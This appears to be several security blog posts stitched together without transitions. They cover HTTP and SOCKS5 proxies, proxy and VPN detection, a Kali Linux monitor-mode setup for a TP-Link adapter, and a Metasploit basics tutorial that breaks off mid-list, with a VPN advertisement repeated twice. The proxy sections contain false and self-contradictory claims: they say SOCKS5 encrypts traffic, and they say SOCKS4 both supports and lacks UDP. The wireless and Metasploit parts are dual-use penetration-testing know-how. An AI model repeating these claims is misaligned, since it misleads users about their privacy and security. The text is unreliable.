A proxy server acts as an intermediary between your device and the internet, allowing you to access websites and online services more securely and anonymously. Whether you’re a casual internet user or a professional looking to protect sensitive data, understanding the differences between HTTP and SOCKS5 proxies can be essential to getting the most out of your online experience.

Proxies play a crucial role in internet browsing because they allow users to access websites that may be blocked in their region or organization. Additionally, they provide an additional layer of security and privacy by hiding your IP address and other identifying information from the websites you visit.

There are different types of proxy servers, but two of the most commonly used ones are:

• HTTP proxies
• SOCKS5 proxies

HTTP proxies are widely used in web browsing, while SOCKS5 proxies are commonly used for more advanced purposes such as online gaming and peer-to-peer (P2P) file sharing. 

This article will explore the differences between HTTP and SOCKS5 proxies to help you understand which is right.

🔥 My go-to VPN: 60% Off Special

Been using VPNBaron as my go-to for years. Their Trojan protocol makes it actually undetectable when needed, support is crazy responsive, and they’re running a rare 60% off right now. Works on all devices, adapts to whatever you’re trying to do.

1.99$/month

What are HTTP proxies?

Before diving deeper into HTTP proxies, let’s first understand the HTTP protocol. HTTP, which stands for Hypertext Transfer Protocol, is an application layer protocol to transfer information between clients, web browsers, and servers. As a client-server protocol, HTTP enables clients to send requests to servers for various data elements, including pages, images, and videos.

An HTTP proxy, also known as a web proxy, is a server that acts as an intermediary between a user’s device and the internet. When a user sends a request to a website, the request first goes through the HTTP proxy server, which then forwards the request to the website. Similarly, when the website responds, the response goes through the HTTP proxy server before reaching the user’s device.

HTTP proxies work by intercepting and forwarding HTTP requests and responses. When a user requests a website, the request is sent to the HTTP proxy server, which checks its cache for a cached copy of the website. If a cached copy is available, the server delivers it to the user without contacting the website. If a cached copy is unavailable, the HTTP proxy server sends the request to the website and receives the response before forwarding it to the user.

Some of the advantages of using HTTP proxies include the following:

• Accessing websites that are blocked by a firewall or geographical restrictions
• Improving the speed of web browsing by caching frequently requested websites
• Providing an additional layer of anonymity when browsing the web. 
• Businesses may also use HTTP proxies to monitor and control employee internet usage.

However, HTTP proxies may not be suitable for more advanced purposes such as gaming or P2P file sharing because they are designed primarily for web browsing and transferring information between clients and servers. 

Gaming and P2P file sharing typically require more complex and specialized network configurations and may involve larger amounts of data transfer, which HTTP proxies may not be able to handle efficiently. HTTP proxies may also pose a security risk as they can intercept and view the user’s web traffic.

What are SOCKS5 proxies?

A SOCKS5 proxy is a type of proxy server that routes traffic at the network level. It differs from HTTP proxies in that it is not limited to HTTP traffic and can handle traffic from protocols such as FTP, SMTP, and POP3. SOCKS5 proxies are commonly used for online gaming, P2P file sharing, and other advanced services.

SOCKS5 proxies work by establishing a TCP connection between the user’s device and the SOCKS5 proxy server. Once the connection is established, the user’s device sends traffic to the SOCKS5 proxy server, which then forwards the traffic to its destination. Unlike HTTP proxies, SOCKS5 proxies do not intercept or modify the traffic in any way.

One advantage of a SOCKS5 proxy is that it can handle traffic from a wide range of protocols, making it suitable for advanced purposes such as gaming and P2P file sharing. Additionally, SOCKS5 proxies provide an additional layer of security and privacy by hiding the user’s IP address and other identifying information from the websites they visit. However, SOCKS5 proxies may be slower than HTTP proxies as they do not cache frequently requested websites.

Common use cases for SOCKS5 proxies include online gaming, P2P file sharing, accessing websites blocked by a firewall or geographical restrictions, and providing anonymity when browsing the web. Businesses may also use SOCKS5 proxies to monitor and control employee internet usage.

Differences between HTTP and SOCKS5 Proxies

Although HTTP and SOCKS5 Proxies serve the same basic purpose of hiding the user’s IP address and providing a layer of anonymity, there are some key differences between them. This section will explore the differences between HTTP and SOCKS5 proxies. By understanding these differences, users can make an informed choice when it comes to selecting the right proxy for their needs.

Protocol differences

HTTP proxies are designed specifically for handling HTTP traffic, while SOCKS5 proxies can handle traffic from a wide range of protocols, including FTP, SMTP, and POP3. This makes SOCKS5 proxies more suitable for advanced purposes such as gaming and P2P file sharing.

Authentication methods

HTTP proxies typically use basic authentication methods such as username and password, while SOCKS5 proxies offer more advanced authentication methods such as GSSAPI (Generic Security Services Application Programming Interface) and NTLM (Windows NT LAN Manager). This makes SOCKS5 proxies more secure than HTTP proxies.

Performance differences

Regarding performance and functionality, HTTP proxies offer the advantage of caching frequently requested websites, which can speed up web browsing. However, this feature is not available with SOCKS5 proxies. On the other hand, SOCKS5 proxies are generally faster than HTTP proxies for handling non-HTTP traffic due to their protocol-independent nature. 

Security differences

HTTP proxies can pose a security risk as they intercept and view the user’s web traffic, while SOCKS5 proxies do not intercept or modify traffic in any way. Additionally, SOCKS5 proxies offer an additional layer of security by hiding the user’s IP address and other identifying information from the websites they visit.

Factors to consider when choosing a proxy

When choosing an HTTP or SOCKS5 proxy, it’s important to consider several factors. 

Types of traffic to be handled

First, users should evaluate their specific needs and determine what kind of traffic they will send through the proxy server. HTTP proxies are optimized for handling HTTP traffic, while SOCKS5 proxies are designed to handle a variety of protocols. Therefore, users who require advanced protocols, such as FTP or P2P file sharing, may find SOCKS5 proxies more suitable for their needs.

Level of security required

Another factor to consider is the level of security required. SOCKS5 proxies offer more advanced authentication methods and an additional layer of security, which may be important for users who are concerned about privacy and security. On the other hand, HTTP proxies may be sufficient for users primarily concerned with accessing blocked websites and do not require additional security features.

User’s specific needs

Budget is also an important consideration when choosing a proxy. HTTP proxies are generally more affordable than SOCKS5 proxies, making them a better choice for users on a tight budget. However, users who require advanced features and security may need to invest more in a SOCKS5 proxy to get the level of service they require.

Wrapping Up

HTTP and SOCKS5 proxies enable users to hide their IP address and access geo-restricted content. However, there are notable differences between the two, such as the level of encryption, the type of traffic supported, and how they handle DNS requests.

If you prioritize speed and compatibility with most web applications, HTTP proxies may be a better choice for you. On the other hand, if you need more advanced features like authentication and UDP traffic support, SOCKS5 proxies may be the way to go.

Do you have any comments or queries about this post? Please, don’t hesitate to let us know in the comments below.

This post will give you a comprehensive understanding of SOCKS5 proxies and even how to setup SOCKS5 on your operating system and browser.

Understanding SOCKS proxies

SOCKS, a short form for “Socket Secure,” has been around for some time and there have been several releases over the years. The first version of SOCKS was released in the early 1990s to enable users to connect to a server through a firewall without compromising security. Since then, there have been different versions of SOCKS, with every new version including support for more advanced features.

The two most widely used SOCKS proxy variants at the moment are SOCKS4 proxies and SOCKS5 proxies.

SOCKS4 was the first major update after the first SOCKS proxy version, and it came with quite some advanced features that were absent in the earlier versions. They include:

• Improved authentication: SOCKS4 introduced a more secure authentication that used the client’s IP address.
• Support for TCP/IP protocols: SOCKS4 included support for various TCP/IP proctors like TCP, UDP, and ICMP. That meant SOCKS4 could handle a wide range of internet traffic, including file transfers, email, and other applications.
• Better firewall traversal: Sending data through different firewalls was problematic for earlier SOCKS releases. In order to help SOCKS traffic get around firewalls and other network limitations, SOCKS4 included a number of optimizations.
• Faster speeds: SOCKS4 boasted improved connection times and reduced latency.

Despite these significant improvements, SOCKS4 still had a few limitations. These included:

• Lack of UDP support: This meant SOCKS4 could not handle applications that require UDP support, such as online gaming, streaming, and video conferencing.
• Limited authentication: SOCKS4 authentication was based on the client’s IP address. Although that was reliable then, SOCKS5 later included more advanced authentication methods.
• Limited DNS support: Lack of in-built support for Domain Name System (DNS) resolution meant SOCKS4 could not handle traffic from domain names.
• Support for IPv6: Lack of support for IPV6 meant that SOCKS4 was less future-proof than its successor, SOCKS5.

What is a SOCKS5 proxy?

The SOCKS5 proxy, like other proxies, enables users to channel their internet data through a remote server, enhancing privacy and security. When a user connects to a website using a SOCKS5 proxy, their IP address is masked, and their internet traffic is encrypted, making it much harder for anyone to monitor their activity or steal their data.

However, you will notice significant differences when you compare the SOCKS5 proxy to other proxies like the HTTP proxy. SOCKS5 proxies offer greater flexibility and security. While HTTP proxies only handle HTTP traffic, SOCKS5 proxies can handle traffic from any application, including email, FTP, and torrent clients. Additionally, SOCKS5 proxies support TCP and UDP traffic, allowing them to handle a wider range of applications than other proxies.

Another important distinction between SOCKS5 proxies and other types of proxies is that SOCKS5 proxies do not modify the user’s data in any way. This means that applications like VoIP, video conferencing, and online gaming work seamlessly with SOCKS5 proxies, unlike others that may cause connection issues or decrease network speeds.

Authentication Methods Supported by SOCKS5 Proxies

SOCKS5 proxies offer three authentication methods:

• Null authentication: This is the usual approach. Connecting to the proxy server doesn’t require authentication.
• Username/password authentication: This method of authentication requires users to provide a username and password to connect to the SOCKS5 proxy server. This method provides a basic level of security for SOCKS5 proxies.
• GSS-API authentication: This is a more secure system-level authentication method that verifies the user’s identity. It uses a ticket-granting ticket (TGT) to authenticate the user and provides more robust security for SOCKS5 proxies.

Benefits of Using a SOCKS5 Proxy

Using a SOCKS5 proxy has several benefits, which include:

• Increased security and privacy: SOCKS5 proxies encrypt your data and hide your IP address, providing better protection for your online activities.
• Access to geo-restricted content: One of the benefits of using a SOCKS5 proxy is the ability to bypass geographical restrictions and access content that may be restricted in your region. This can enable you to access websites, services, and other content that you might not be able to access otherwise.
• Greater flexibility and compatibility: SOCKS5 proxies are compatible with different applications, making them a more versatile option than other proxies.

However, there are also some drawbacks to using SOCKS5 proxies. One of the most significant is that they require more configuration and technical expertise to set up than other proxies. 

Another drawback is that SOCKS5 proxies may cause a slowdown in your internet connection due to the additional overhead of encryption and routing. This can lead to longer load times and reduced speeds when browsing the internet. However, the extent of the slowdown can depend on several factors, such as the quality of the proxy service and the distance between you and the proxy server.

Is a SOCKS5 proxy better than a VPN?

Both SOCKS5 proxies and VPNs (Virtual Private Networks) are effective tools for improving online security and privacy. However, the choice between the two depends on your individual needs and use case. There is no one-size-fits-all solution, as both proxies and VPNs have their unique advantages and disadvantages.

SOCKS5 proxies are ideal for users who want to mask their IP address and encrypt their internet traffic for specific applications, such as torrenting, online gaming, or accessing geo-restricted content. SOCKS5 proxies offer greater flexibility regarding which applications they can handle, as they do not modify user data and can handle both TCP and UDP traffic.

On the other hand, VPNs offer a more comprehensive solution for protecting online privacy and security. VPNs encrypt all of a user’s internet traffic, not just traffic from specific applications, providing greater protection. VPNs also offer additional features, such as choosing server locations and switching between protocols for optimized performance.

In terms of speed, SOCKS5 proxies tend to be faster than VPNs, as they do not require as much processing overhead. However, this can also make SOCKS5 proxies less secure than VPNs, as they do not provide the same level of encryption and protection.

Best practices for using SOCKS5 proxies:

When using a SOCKS5 proxy, there are several important steps you can take to ensure that your online activities are secure and protected. In this section, we’ll explore five key steps you can take to stay safe when using a SOCKS5 proxy.

• Choose a reputable SOCKS5 proxy provider: It’s important to select a trustworthy and reliable SOCKS5 proxy provider to ensure that your online activities are protected. Look for providers with a proven track record of delivering quality services.
• Use a SOCKS5 proxy server that is geographically close to your location to reduce latency: When selecting a SOCKS5 proxy server, choose one that is located close to your physical location. This will help reduce latency and improve the speed of your internet connection.
• Always use encryption when using a SOCKS5 proxy: Encryption is an important security measure when using a SOCKS5 proxy. Make sure that your proxy provider offers encryption, and ensure that your connection is encrypted when you’re using the proxy.
• Use strong and unique passwords for any accounts associated with your SOCKS5 proxy: If you need to create an account to use your SOCKS5 proxy provider’s services, make sure to use strong and unique passwords. Avoid using the same password across multiple accounts, as this increases the risk of your accounts being compromised.
• Keep your operating system and applications up to date with the latest security patches: To ensure that your system is secure, always keep your operating system and applications up to date with the latest security patches. This will help protect against known vulnerabilities that could be exploited by attackers.

SOCKS5 vs HTTP proxy

SOCKS5 and HTTP proxies are both types of proxies used to reroute internet traffic. SOCKS5 is a more advanced and secure protocol compared to HTTP. While HTTP proxies are commonly used for web browsing, SOCKS5 can be used for a wider range of applications, including torrenting and gaming. SOCKS5 also offers authentication methods, including null authentication, username/password authentication, and GSS-API authentication. 

For a more detailed comparison between SOCKS5 and HTTP proxies, you can check out our blog post titled “SOCKS5 vs. HTTP Proxy: Which One Should You Use? (Add link to other post)”

Should You Use a Free SOCKS5 Proxy?

While it may be tempting to use a free SOCKS5 proxy, it is generally not recommended. Free proxies often come with several downsides that can put your online security and privacy at risk.

Firstly, free proxies can be very slow and unreliable. This is because free proxy providers often have limited resources and cannot afford to maintain a robust infrastructure. As a result, you may experience slow speeds, connection drops, or even total connection failures, which can be frustrating and counterproductive.

Secondly, free SOCKS5 proxies can pose privacy issues. Many free proxies are operated by malicious actors who can monitor your internet traffic and collect your sensitive data, such as login credentials, credit card details, or personal information. This can result in identity theft, financial fraud, and other serious consequences.

Finally, free proxies may come bundled with malware or other harmful software that can infect your device and compromise your security. This is because free proxies are often used as a distribution channel for malware and other cyber threats, which can harm your device and steal your data.

While free SOCKS5 proxies may seem like an attractive option, the risks and downsides outweigh the benefits. It is recommended to use a paid SOCKS5 proxy service from a reputable provider for a safer and more reliable browsing experience.

Conclusion

SOCKS5 proxies are a powerful tool for enhancing online security and privacy. They allow users to mask their IP address, encrypt their data, access geo-restricted content, and bypass censorship. While SOCKS5 proxies offer greater flexibility and compatibility with different types of applications than other types of proxies, they do require more technical expertise to set up and may slow down internet connections. Overall, SOCKS5 proxies provide a valuable solution for users who want to protect their online identity and stay safe while browsing the internet.

🔥 My go-to VPN: 60% Off Special

Been using VPNBaron as my go-to for years. Their Trojan protocol makes it actually undetectable when needed, support is crazy responsive, and they’re running a rare 60% off right now. Works on all devices, adapts to whatever you’re trying to do.

1.99$/month

In today’s digital world, more internet users are turning to proxies and VPNs to maintain their online privacy and security.

While these tools can be beneficial, they can also be misused for malicious purposes or to bypass restrictions.

As a result, detecting proxies and VPNs has become increasingly important for website owners and administrators.

In this article, we will discuss some of the methods used to detect proxies and VPNs and explain how this process works. We will also discuss the types of proxy servers, differences between VPNs and proxies, and whether all proxies and VPNs can be detected.

Additionally, we’ll explore if these tools can be traced back to the user’s real IP address and how this can be done.

Finally, we will address frequently asked questions about VPNs, proxies, and their detection. This article is designed to be easy to understand for beginners, with headings to make it simple to skim through.

How a Simple Proxy or VPN Detection Service Works

In easy-to-understand terms, a proxy or VPN detection service analyzes various aspects of a user’s connection to determine if they are using a proxy or VPN.

Here’s a simple explanation of some of the detection methods:

1. Response Headers: When a user connects to a website, their browser sends a request that includes certain information in the form of headers. Some proxy servers or VPNs add, modify, or remove specific headers that can be a telltale sign that a proxy or VPN is in use.
2. IP Analysis: Proxy and VPN detection services maintain databases of known proxy and VPN IP addresses. By comparing a user’s IP address to this database, the service can determine if the IP address is associated with a proxy or VPN.
3. Specialized APIs: Some detection services, like ProxyCheck.io or IPQualityScore.com, offer APIs (Application Programming Interfaces) that can perform more in-depth analysis of IP addresses and other connection attributes. These APIs may use advanced techniques, such as TCP fingerprinting or WebRTC leak detection, to identify VPN and proxy usage.

In our example, we created a simple WordPress plugin that uses the ProxyCheck.io API to detect proxies and VPNs.

The plugin sends a user’s IP address and other connection details to the API, which analyzes the information and returns a result indicating whether a proxy or VPN has been detected.

The plugin then displays this information to the user, along with other relevant data such as IP address, country, and ISP.

What is a Proxy?

In simple terms, a proxy is an intermediary server that sits between your computer and the internet. It acts as a “middleman,” relaying your requests to websites and forwarding the responses back to you.

By doing this, the proxy hides your real IP address, making it appear as if the requests are coming from the proxy server instead of your computer.

A proxy server is typically a computer or a network device that has been set up to provide this intermediary service. It can be located anywhere in the world, and its primary function is to process and forward web traffic.

Proxy servers are created and maintained by individuals, companies, or organizations for various purposes, such as enhancing privacy, improving performance through caching, or enabling access to geo-restricted content.

Types of Proxy Servers

There are several types of proxy servers, each with its own characteristics and use cases:

1. HTTP Proxy: These proxies handle web traffic and are primarily used for web browsing. They can cache web pages and provide anonymity by masking the user’s IP address.
2. SOCKS Proxy: A more versatile type of proxy that can handle various types of traffic, including HTTP, FTP, and more. SOCKS proxies provide anonymity but do not cache web pages.
3. Transparent Proxy: These proxies do not provide anonymity, as they forward the user’s real IP address to the destination server. They are often used for caching and content filtering purposes.
4. Anonymous Proxy: As the name suggests, these proxies focus on providing anonymity by hiding the user’s IP address and not disclosing any information about the user to the destination server.
5. Elite Proxy: These proxies offer the highest level of anonymity by not only masking the user’s IP address but also hiding the fact that a proxy is being used.

What is a VPN?

A Virtual Private Network (VPN) is a service that creates a secure, encrypted connection between your computer and the internet. Like a proxy, a VPN also routes your web traffic through a remote server, hiding your real IP address and making it appear as if you are browsing from the location of the VPN server.

However, a VPN goes a step further by encrypting your data, which adds an extra layer of security and privacy. This encryption ensures that your online activities remain private, even if your connection is intercepted by hackers or monitored by third parties.

VPNs are provided by VPN service providers, which maintain a network of servers across various locations.

These providers develop and offer VPN software or apps that you can install on your computer or mobile device. When you connect to a VPN server, the software creates an encrypted “tunnel” through which your internet traffic passes, keeping your data secure and your online identity hidden.

What Are Some of Differences Between VPNs and Proxies?

Both VPNs and proxies are used to route your internet traffic through a remote server, thus hiding your real IP address. However, there are some key differences between the two:

1. Encryption: VPNs encrypt your data, providing a secure and private connection, while proxies do not usually offer encryption.
2. Traffic Types: VPNs route all your internet traffic through the VPN server, whereas proxies typically only route specific types of traffic (e.g., HTTP, SOCKS).
3. Performance: VPNs may have a greater impact on your internet speed, as they use encryption and handle all your traffic. Proxies generally have a smaller impact on performance, as they route only specific types of traffic.
4. Use Cases: VPNs are better suited for privacy, security, and unblocking geo-restricted content, while proxies are more commonly used for anonymity, caching, and content filtering.

How Can You Detect a Proxy or VPN

How Do IP Analysis APIs Detect VPNs and Proxies

IP Analysis APIs, such as ProxyCheck.io and IPQualityScore.com utilize a combination of techniques to identify VPNs and proxies. Here are the main methods employed:

1. IP Database: These services maintain a comprehensive database of known VPN and proxy server IP addresses. This database is regularly updated to ensure accuracy.
2. Reverse DNS Lookup: A reverse DNS lookup can reveal whether an IP address is associated with a hosting provider or a data center, which are commonly used by VPN and proxy services.
3. TCP Fingerprinting: Analyzing the TCP/IP packets sent by a user can help identify whether they are using a VPN or proxy service. This technique looks for specific patterns and anomalies in the packet structure.
4. WebRTC Leak Detection: WebRTC is a browser-based communication protocol that can inadvertently leak a user’s true IP address, even when using a VPN or proxy. IP detection services check for these leaks to help identify VPN and proxy users.
5. DNSBL Test: A test that checks if the IP address is listed on any DNS-based blackhole lists (DNSBLs). These lists contain IP addresses associated with known VPNs, proxies, and other suspicious activities.

What Is a VPN Leak, How Does that Affect You, and How Can It Be Fixed?

A VPN leak occurs when your real IP address or other identifying information is inadvertently exposed while using a VPN.

This can compromise your privacy and security. There are several types of VPN leaks, such as DNS leaks, WebRTC leaks, and IPv6 leaks.

A VPN leak can affect you by:

1. Revealing your true IP address and location, which can be used to track your online activities.
2. Exposing your browsing habits and personal information to hackers, advertisers, or other third parties.
3. Undermining your efforts to bypass geo-restrictions or access blocked content.

To fix a VPN leak, you can:

1. Use a reliable VPN service that offers built-in leak protection.
2. Disable WebRTC in your browser or use a browser extension that blocks WebRTC leaks.
3. Ensure that your VPN supports IPv6 or disable IPv6 on your device.

In conclusion, detecting VPNs and proxies can be a complex task, but services like ProxyCheck.io IPQualityScore.com make it easier by employing various methods to identify users who are masking their online identity. Understanding the differences between VPNs and proxies, as well as knowing the potential risks associated with VPN leaks, can help users make informed decisions about their online privacy and security.

Frequently Asked Questions

How to Start Analyzing IPs and User Connections

IP analysis is the process of examining an IP address to gather information about the user’s connection and determine if it might be originating from a proxy or VPN.

The following are some simple techniques that you can use to analyze an IP address yourself:

1. IP Geolocation: By determining the geographic location associated with an IP address, you can check if the user’s claimed location matches the IP’s actual location. There are several online services and databases, such as MaxMind GeoIP, IP2Location, and ipapi, that offer geolocation data for IP addresses. If the locations don’t match, it could indicate the use of a proxy or VPN.
2. IP Blacklists: Many organizations maintain lists of known proxy and VPN IP addresses. By checking if an IP address is present in these blacklists, you can determine if it’s associated with a proxy or VPN service. Some popular IP blacklists include the ones provided by IPQualityScore, ProxyCheck.io, and IPHub.
3. ASN Lookup: The Autonomous System Number (ASN) is a unique identifier for a network or internet service provider (ISP) that controls a group of IP addresses. By looking up the ASN associated with an IP address, you can identify the ISP or organization that owns the IP address. If the IP address belongs to a known VPN provider or data center, it could indicate the use of a proxy or VPN. You can use services like Hurricane Electric’s BGP Toolkit, Cymru’s IP to ASN Mapping, or Team Cymru’s IP to ASN Lookup to find the ASN for an IP address.
4. Reverse DNS Lookup: A reverse DNS lookup resolves an IP address back to its corresponding domain name. In some cases, the domain name can reveal if the IP address belongs to a known proxy or VPN provider. There are various online tools, such as MX Toolbox, DNSChecker, and CentralOps, that allow you to perform reverse DNS lookups.
5. IP Reputation: By checking the reputation of an IP address, you can determine if it has been involved in any malicious activities, such as spamming or hacking. A poor IP reputation could indicate that the IP address belongs to a proxy or VPN service that is frequently used for nefarious purposes. Services like Spamhaus, Sender Score, and Talos Intelligence provide IP reputation data.

Keep in mind that while these techniques can help you analyze an IP address and identify proxies or VPNs to some extent, they may not catch all instances, especially those that employ advanced evasion techniques.

For more accurate results, you may need to use specialized APIs or services that employ a combination of these techniques along with advanced analysis methods.

Example Simple Header Analysis to Detect a Proxy

In the context of detecting proxies or VPNs, a response header is a piece of information that the user’s browser sends to the web server when making a request. These headers can provide clues about whether a user is connecting through a proxy or VPN. Here’s an example of a few response headers that may be useful for detecting proxies or VPNs:

GET /example-page HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
X-Forwarded-For: 123.45.67.89
Via: 1.1 proxy-server-name (Apache/2.4.41)

In this example, the X-Forwarded-For header contains an IP address (123.45.67.89) that indicates the original client’s IP. This header is often added by proxy servers to inform the destination server about the user’s actual IP address. However, not all proxy servers add this header, and some may even remove it to enhance anonymity.

The Via header provides information about the proxy server through which the request has been made. In this case, the header reveals that the request has been forwarded through a proxy server named proxy-server-name running Apache 2.4.41.

By analyzing these headers, a proxy or VPN detection service can gain insights into whether a user is connecting through a proxy or VPN.

However, as we mentioned before, not all proxies or VPNs can be detected solely based on headers, as some services may modify or remove certain headers to avoid detection.

Some sources may be confusing, and lead you to believe that you can only enable monitor mode on TP-LINK TL-WN722N v1 because it has one of the required chipsets for monitor mode, Atheros AR9271, and that you can’t enable it on V2/V3. You can, however.

To start off, if you’re using a virtual machine, first you’ll have to connect your wireless adapter to your Kali Linux virtual machine.

Set up the Adapter

Next, we’ll run some commands to set up the adapter.

First update and upgrade your package index.

sudo apt update && sudo apt upgrade

Reboot your machine.

sudo reboot

Install Linux headers for your Kali Linux.

sudo apt install linux-headers-$(uname -r)

Run the following commands to install the bc package and remote the r8188eu.ko module.

sudo apt install bc

sudo rmmod r8188eu.ko

Clone the Realtek driver from the aircrack-ng Github repository.

git clone https://github.com/aircrack-ng/rtl8188eus

Run the following commands.

cd rtl8188eus

sudo -i

echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"

exit

reboot

After the reboot run the following commands (we have to cd back into the rtl8188eus directory that we cloned earlier):

cd rtl8188eus

make

sudo make install

sudo modprobe 8188eu

Enable Monitor Mode

To enable monitor mode, run the following commands:

sudo ifconfig wlan0 down

sudo airmon-ng check kill

sudo iwconfig wlan0 mode monitor

sudo ifconfig wlan0 up

sudo iwconfig

Here’s the output you should be seeing. You can see that the adapter is set to Mode: Monitor.

Troubleshooting When Enabling Monitor Mode

In some cases it doesn’t work right away. For example you may get the error Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Operation not permitted.

The solution that has worked for me every time is the following (credit to this Github user’s comment).

Run the following commands in this order:

sudo ifconfig wlan0 up
sudo rmmod r8188eu.ko
sudo modprobe 8188eu
sudo iwconfig wlan0 mode auto
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Now when you check iwconfig you should see the adapter is in monitor mode.

Conclusion

In this tutorial we set up a TP-LINK TL-WN722N V2/V3 adapter to run in monitor mode. If you have any issues or questions then please don’t hesitate to leave a comment. Hope this helped. Thank you.

If you ever tried to exploit some vulnerable systems, chances are you have used Metasploit, or at least, are familiar with the name. It allows you to find information about system vulnerabilities, use existing exploits to penetrate the system, helps create your own exploits, and much more.

In this tutorial, we’ll be covering the basics of Metasploit Framework in detail and show you real examples of how to use this powerful tool to the fullest.

Installing Metasploit

Metasploit is available for Windows and Linux OS, and you can download the source files from the official repository of the tool in Github. If you are running any OS designed for penetration testing, e.g., Kali Linux, it will be pre-installed in your system. We’ll be covering how to use Metasploit Framework version 6 on Kali Linux. However, the basics will remain the same wherever you’re using Metasploit.

Installing Metasploit on Linux

To install Metasploit in Linux you have to get the package metasploit-framework. On Debian and Ubuntu based Linux distros, you can use the apt utility:

apt install metasploit-framework

On CentOS/Redhat you can the yum utility to do the same:

yum install metasploit-framework

Find out the version of Metasploit and updating

If you’re not sure if you have Metasploit or not, you can confirm by typing msfconsole in your terminal:

msfconsole

 _                                                    _
/ \    /\         __                         _   __  /_/ __                                                                                                                                                      
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                                                                                                                                     
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                                                                                                                                    
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                                                                                                                                    
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                                                                                                                                   
                                                                                                                                                                                                                 

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

Metasploit Tip: Start commands with a space to avoid saving them to history

As you can see my machine already has Metasploit Framework installed.

Metasploit changes its greeting messages every time you fire up the Metasploit Framework with the msfconsole command, so you might see a different greeting message when you run it.

You can also find out which version is installed once the program loads. Type in version and hit enter to get the answer:

version

Framework: 6.1.27-dev
Console  : 6.1.27-dev

I am using version 6. If you haven’t updated your Metasploit anytime soon, it’s a good idea to update it before starting to use it. This is because if the tool is old then the updated exploits will not get added to the database of your Metasploit Framework. You can update the program by the msfupdate command:

msf6 > msfupdate

[*] exec: msfupdate

msfupdate is no longer supported when Metasploit is part of the operating

system. Please use ‘apt update; apt install metasploit-framework’

As you can see the msfupdate command is not supported. This happened because Metasploit is already a part of the operating system in the Kali Linux updated versions. If you’re using older versions of the Kali Linux, this command will work fine for your system.

Now that you know how to install and update the Metasploit framework, let’s begin learning some of the basics related to Metasploit.

Basics of Penetration testing

Before we begin, let’s familiarize ourselves with some of the steps of a penetration test briefly. If you’re already familiar with the concept then you can just skip ahead to the good part. Let’s list some of the fundamental steps in penetration testing:

1. Information Gathering / Reconnaissance
2. Vulnerability Analysis
3. Exploitation
4. Post Exploitation
5. Report

1. Information gathering / Reconnaissance

At the very beginning of any penetration testing, information gathering is done. The more information you can gather about the target, the better it will be for you to know the target system and use the information later in the process. Information may include crucial information like the open ports, running services, or general information such as the domain name registration information. Various techniques and tools are used for gathering information about the target such as – nmap, zenmap, whois, nslookup, dig, maltego, etc.

One of the most used tools for information gathering and scanning is the nmap or Network Mapper utility. For a comprehensive tutorial for information gathering and nmap which you can check out from here.

2. Vulnerability Analysis

In this step, the potential vulnerabilities of the target are analyzed for further actions. Not all the vulnerabilities are of the same level. Some vulnerabilities may give you entire access to the system once exploited while some may only give you some normal information about the system. The vulnerabilities that might lead to some major results are the ones to go forward with from here. This is the step where Metasploit gives you a useful database to work with.

3. Exploitation

After the identified vulnerabilities have been analyzed, this is the step to take advantage of the vulnerabilities.

In this step, specific programs/exploits are used to attack the machine with the vulnerabilities.

You might wonder, where do these exploits come from?

Exploits come from many sources. One of the primary source is the vulnerability and exploit researchers. People do it because there is a lot at stake here i.e., there may be huge sums of money involved as a bounty.

Now, you may ask if the vulnerabilities are discovered, aren’t those application already fixed? The answer is yes, they are. But the fix comes around in the next update of the application.

Those who are already using the outdated version might not get the update and remains vulnerable to the exploits. The Metasploit Framework is the most suitable tool for this step. It gives you the option to choose from thousands of exploits and use them directly from the Metasploit console. New exploits are updated and incorporated in Metasploit regularly. You may also add some other exploits from online exploit databases like Exploit-DB.

Further, not all the exploits are ready-made for you to use. Sometimes you might have to craft your own exploit to evade security systems and intrusion detection systems. Metasploit also has different options for you to explore on this regard.

4. Post Exploitation

This is the step after you’ve already completed exploiting the target system. You’ve got access to the system and this is where you will decide what to do with the system. You may have got access to a low privilege user. You will try to escalate your privilege in this step. You may also keep a backdoor the victim machine to allow yourself to enter the system later whenever you want. Metasploit has numerous functionalities to help you in this step as well.

5. Report

This is the step that many penetration testers will have to complete. After carrying out their testing, the company or the organization will require them to write a detailed report about the testing and improvement to be done.

Now, after the long wait, let’s get into the basics of the actual program – Metasploit Framework.

Basics of Metasploit Framework

In this section, we’ll learn all the basics related to Metasploit Framework. This will help us understand the terminologies related to the program and use the basic commands to navigate through.

Modules of Metasploit Framework

As discussed earlier, Metasploit can be used in most of the penetration testing steps. The core functionalities that Metasploit provides can be summarized by some of the modules:

1. Exploits
2. Payloads
3. Auxiliaries
4. Encoders

Now we’ll discuss each of them and explain what they mean.

1. Exploits

Exploit is the program that is used to attack the vulnerabilities of the target. There is a large database for exploits on Metasploit Framework. You can search the database for the exploits and see the information about how they work, the time they were discovered, how effective they are, and so on.

2. Payloads

Payloads perform some tasks after the exploit runs. There are different types of payloads that you can use. For example, you could use the reverse shell payload, which basically generates a shell/terminal/cmd in the victim machine and connects back to the attacking machine.

Another example of a payload would be the bind shell. This type of shell creates a listening port on the victim machine, to which the attacker machine then connects. The advantage of a reverse shell over the bind shell is that the majority of the system firewalls generally do not block the outgoing connections as much as they block the incoming ones.

Metasploit Framework has a lot of options for payloads. Some of the most used ones are the reverse shell, bind shell, meterpreter, etc.

3. Auxiliaries

These are the programs that do not directly exploit a system. Rather they are built for providing custom functionalities in Metasploit. Some auxiliaries are sniffers, port scanners, etc. These may help you scan the victim machine for information gathering purposes. For example, if you see a victim machine is running ssh service, but you could not find out what version of ssh it is using – you could scan the port and get the version of ssh using auxiliary modules.

4. Encoders

